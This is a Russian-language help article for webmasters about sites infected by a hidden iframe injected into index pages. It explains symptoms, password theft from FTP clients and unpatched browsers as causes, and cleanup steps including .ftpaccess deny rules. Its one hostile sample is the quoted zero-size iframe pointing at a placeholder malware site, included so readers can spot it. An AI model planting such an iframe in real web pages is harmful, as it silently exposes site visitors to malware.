Суть проблемы
В последнее время наблюдается взлом сайтов, с заменой/добавлением во всех индексах, контента на данный код
<iframe width="0" height="0" src="http://сайт содержащий ирусы"></iframe>
После заражения сайт начинает распространять вирусы с третьего сайта и уже через пару дней попадет в банн Google. Более того, при восстановлении сайта из бекапа вирус прописывается обратно уже через пару часов после "лечения".
Провайдеры убеждают, что это кривые руки вебмастеров и не желают сотрудничать, советуя нижеприведенные варианты излечения.
Обнаружение
1. Заходя на свой сайт, пользователь получает предупреждение от антивируса о том что сайт заражен. (Иногда вместо этого отображается просто белая страница или куски кода на ней.)
2. При просмотре исходного кода страницы обнаруживает чужеродный код (чаще всего заключенный в тэг <iFrame>).
3. Веб-мастер обнаруживает свой сайт в бане у Google, или страницу с предупреждением браузеров семейства Mozilla Firefox.
Причины заражения
Кража паролей доступа к аккаунту сайта.
В большинстве слечаев происходит кража паролей из файла паролей Вашего FTP менеджера, такого как Total Commander или FAR Manager.
Вторым извстным способом является использование уязвимости Microsoft, если не установленна соответствующая заплатка. Например "Exploit.HTML.Iframe.FileDownload"* - это исправление выпущено компанией Microsoft еще 29 марта 2001 г!
*заплатка на данную уязвимость приведена как пример, полный список уязвимостей и заплаток ищите на сайте http://www.microsoft.com
Но не все пользователи заботятся об установке подобных исправлений.
Получая заражённое таким образом письмо или посещая сайт с таким эксплоитом Вы, сами того не ведая, загружаете на свой компьютер (и запускается он автоматически) другой вирус, чаще всего троян, который ворует Ваши пароли.
Чем рискуем
Пароли на кошельки webmoney, Яндекс-деньги, ftp аккаунты Ваших сайтов и так далее оказываются вруках злоумышленника и в один прекрасный день Вы видите на своём сайте очередной код затрояненой странички (добавляется к вашей станичке пара строчек), а у себя в кошельке видите одни нули. Вычислить интернет-преступников невозможно. И если восстановить сайт достаточно просто из backup, то денег на электронных счетах Вам, практически, больше не увидеть. Пример кражи ftp-паролей из Total Commander подробно описан здесьПорядок лечения
1. Вычистить свой компьютер от "заразы", например, установив антивирус со свежими обновлениями. В критических случаях Вам придётся полностью переустановить систему, так как внедрение вирусов на Ваш компьютер может дойти до такой степени, что лечению это не поддаётся.
2. Установить все сервис-паки на свою операционную систему, убирающие уязвимости Windows известные компании Microsoft до текущего времени.
3. Изменить все свои пароли, в том числе и на почтовые ящики на бесплатных хостингах.
4. Кардинальный способ: заблокировать ftp доступ к сайту.
5. Учтановить собственную защиту папок на веб-сервере с помощью директадмина Создайте файл .ftpaccess с таким содержанием DenyAll
6. Если есть полная уверенность, что с Вашей сети, например, заражение не произойдёт, а от всех остальных хотелось бы закрыть доступ, то можете разрешить доступ с некоторго диапазона адресов, например так
Allow 192.168.0.1
DenyAll
Куда обращаться
Советы бывалых
Не теряйте бдительности, утешая себя мыслью "А я не пользуюсь IE, я работаю под FireFox (Opera, Chrome и так далее, можете подставить в этот список свой любимый браузер), там нет уязвимостей. Это не так, уязвимости периодически обнаруживают в любом ПО.
Кроме того, помимо браузеров заражение также пожет происходить например через продукты Acrobat (Reader) и Flash Player, которые установлены на большинстве компьютеров. И на них точно также необходимо устанавливать патчи безопасности от производителей.
| 
